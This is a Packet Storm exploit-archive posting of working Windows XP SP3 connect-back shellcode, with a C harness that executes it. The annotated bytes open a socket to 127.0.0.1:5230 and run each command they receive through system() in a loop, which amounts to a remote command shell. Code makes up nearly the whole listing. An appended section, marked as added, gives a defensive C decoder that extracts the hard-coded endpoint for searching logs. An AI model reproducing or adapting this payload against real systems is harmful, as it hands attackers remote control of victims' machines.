
Windows XP SP3 EN Null-Free Connect Back Shellcode

Posted Dec 25, 2010
Authored by AutoSec Tools

228 bytes small Microsoft Windows XP SP3 EN null-free connect-back shellcode.

tags | shellcode
systems | windows, xp
MD5 | 2e088e5ff54e3ed964db40cd7b87d363

/*------------------------------------------------------------------------
Title...................Windows XP SP3 EN Null-free Connect Back Shellcode 228 Bytes
Release Date............12/7/2010
Tested On...............Windows XP SP3 EN
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://www.johnleitch.net/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------*/

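#include <stdio.h>  // printf
#include <string.h> // strlen

int main(int argc, char *argv[])
{
// Connects back to 127.0.0.1:5230, so a listener must already be waiting on that port
char* shellcode=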
"\x33\xDB" // xor ebx,ebx
"\xC7\x45\x08\x40\xAE\x80\x7C" // mov dword ptr [argc],7C80AE40h
"\xC7\x45\x04\x7B\x1D\x80\x7C" // mov dword ptr [ebp+4],7C801D7Bh
"\x68\x64\x6C\x6C\x01" // push 16C6C64h
"\xD0\x6C\x24\x03" // shr byte ptr [esp+3],1
"\x68\x6B\x33\x32\x2E" // push 2E32336Bh
"\x68\x77\x73\x6F\x63" // push 636F7377h
"\x54" // push esp
"\xFF\x55\x04" // call dword ptr [ebp+4]
"\x8B\xF0" // mov esi,eax
"\x53" // push ebx
"\xC6\x04\x24\x75" // mov byte ptr [esp],75h
"\xC6\x44\x24\x01\x70" // mov byte ptr [esp+1],70h
"\x68\x74\x61\x72\x74" // push 74726174h
"\x68\x57\x53\x41\x53" // push 53415357h
"\x54" // push esp
"\x56" // push esi
"\xFF\x55\x08" // call dword ptr [argc]
"\x83\xEC\x7F" // sub esp,7Fh
"\x83\xEC\x7F" // sub esp,7Fh
"\x83\xEC\x7F" // sub esp,7Fh
"\x83\xEC\x13" // sub esp,13h
"\x54" // push esp
"\x54" // push esp
"\xFF\xD0" // call eax
"\x53" // push ebx
"\xC6\x04\x24\x65" // mov byte ptr [esp],65h
"\xC6\x44\x24\x01\x74" // mov byte ptr [esp+1],74h
"\x68\x73\x6F\x63\x6B" // push 6B636F73h
"\x54" // push esp
"\x56" // push esi
"\xFF\x55\x08" // call dword ptr [argc]
"\x53" // push ebx
"\x6A\x01" // push 1
"\x6A\x02" // push 2
"\xFF\xD0" // call eax
"\x89\x45\xFC" // mov dword ptr [ebp-4],eax
"\x68\x65\x63\x74\x01" // push 1746365h
"\xD0\x6C\x24\x03" // shr byte ptr [esp+3],1
"\x68\x63\x6F\x6E\x6E" // push 6E6E6F63h
"\x54" // push esp
"\x56" // push esi
"\xFF\x55\x08" // call dword ptr [argc]
"\x6A\x01" // push 1
"\x6A\x7F" // push 7Fh
"\xC6\x44\x24\x03\x01" // mov byte ptr [esp+3],1
"\x68\x02\x01\x14\x6E" // push 6E140102h
"\xD0\x6C\x24\x01" // shr byte ptr [esp+1],1
"\x8B\xFC" // mov edi,esp
"\x6A\x10" // push 10h
"\x57" // push edi
"\xFF\x75\xFC" // push dword ptr [ebp-4]
"\xFF\xD0" // call eax
"\x53" // push ebx
"\x68\x72\x65\x63\x76" // push 76636572h
"\x54" // push esp
"\x56" // push esi
"\xFF\x55\x08" // call dword ptr [argc]
"\x53" // push ebx
"\x6A\x7F" // push 7Fh
"\x57" // push edi
"\xFF\x75\xFC" // push dword ptr [ebp-4]
"\xFF\xD0" // call eax
"\x53" // push ebx
"\xC6\x04\x24\x6C" // mov byte ptr [esp],6Ch
"\xC6\x44\x24\x01\x6C" // mov byte ptr [esp+1],6Ch
"\x68\x72\x74\x2E\x64" // push 642E7472h
"\x68\x6D\x73\x76\x63" // push 6376736Dh
"\x54" // push esp
"\xFF\x55\x04" // call dword ptr [ebp+4]
"\x53" // push ebx
"\xC6\x04\x24\x65" // mov byte ptr [esp],65h
"\xC6\x44\x24\x01\x6D" // mov byte ptr [esp+1],6Dh
"\x68\x73\x79\x73\x74" // push 74737973h
"\x54" // push esp
"\x50" // push eax
"\xFF\x55\x08" // call dword ptr [argc]
"\x57" // push edi
"\xFF\xD0" // call eax
"\xEB\xBB" // jmp recv_loop (4010B3h)
;

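// strlen works here only because the byte string is null-free
printf("shellcode length: %u", (unsigned)strlen(shellcode));

// MSVC x86 inline assembly: transfers control to the byte string above
__asm jmp shellcode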

return 0;
}
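
Added example, not part of the original listing: a small C decoder a responder can use to recover the hard-coded connect-back endpoint from the sockaddr-building bytes above. It replays the stack writes, including the `shr` that turns 01h into the 00h the null-free encoding cannot carry directly; `struct endpoint` and `decode_endpoint` are names assumed for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Bytes copied from the sockaddr_in-building instructions in the listing. */
static const uint8_t SOCKADDR_BUILD[] = {
    0x6A, 0x01, 0x6A, 0x7F,       /* push 1 ; push 7Fh      */
    0xC6, 0x44, 0x24, 0x03, 0x01, /* mov byte ptr [esp+3],1 */
    0x68, 0x02, 0x01, 0x14, 0x6E, /* push 6E140102h         */
    0xD0, 0x6C, 0x24, 0x01        /* shr byte ptr [esp+1],1 */
};
struct endpoint { int ok; unsigned port; uint32_t ip; }; /* hypothetical name */
/* Replay the four stack-writing encodings, then read the sockaddr_in at ESP. */
struct endpoint decode_endpoint(const uint8_t *c, size_t n)
{
    struct endpoint e = {0};
    uint8_t stk[64] = {0}; /* scratch stack; grows downward from the end */
    size_t sp = sizeof stk, i = 0;
    while (i < n) {
        if (c[i] == 0x6A && n - i >= 2 && c[i + 1] < 0x80 && sp >= 4) {
            sp -= 4;            /* push imm8 (non-negative immediates only) */
            stk[sp] = c[i + 1]; /* bytes below the old ESP are still zero */
            i += 2;
        } else if (c[i] == 0x68 && n - i >= 5 && sp >= 4) {
            sp -= 4;            /* push imm32, stored little-endian */
            memcpy(stk + sp, c + i + 1, 4);
            i += 5;
        } else if (n - i >= 5 && !memcmp(c + i, "\xC6\x44\x24", 3) && sp + c[i + 3] < sizeof stk) {
            stk[sp + c[i + 3]] = c[i + 4]; /* mov byte ptr [esp+d],imm8 */
            i += 5;
        } else if (n - i >= 4 && !memcmp(c + i, "\xD0\x6C\x24", 3) && sp + c[i + 3] < sizeof stk) {
            stk[sp + c[i + 3]] >>= 1;      /* shr byte ptr [esp+d],1 */
            i += 4;
        } else {
            return e; /* unsupported or truncated instruction: ok stays 0 */
        }
    }
    if (sp + 8 > sizeof stk) return e;
    e.port = (stk[sp + 2] << 8) | stk[sp + 3]; /* sin_port, network byte order */
    e.ip = (uint32_t)stk[sp + 4] << 24 | stk[sp + 5] << 16 | stk[sp + 6] << 8 | stk[sp + 7];
    e.ok = (stk[sp] == 2 && stk[sp + 1] == 0); /* sin_family must be AF_INET (2) */
    return e;
}

int main(void)
{
    struct endpoint e = decode_endpoint(SOCKADDR_BUILD, sizeof SOCKADDR_BUILD);
    printf("ok=%d ip=0x%08X port=%u\n", e.ok, (unsigned)e.ip, e.port);
    return 0;
}
```

The decoded address and port are the values to search for in firewall, proxy and netflow logs.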

© 2019 Packet Storm. All rights reserved.
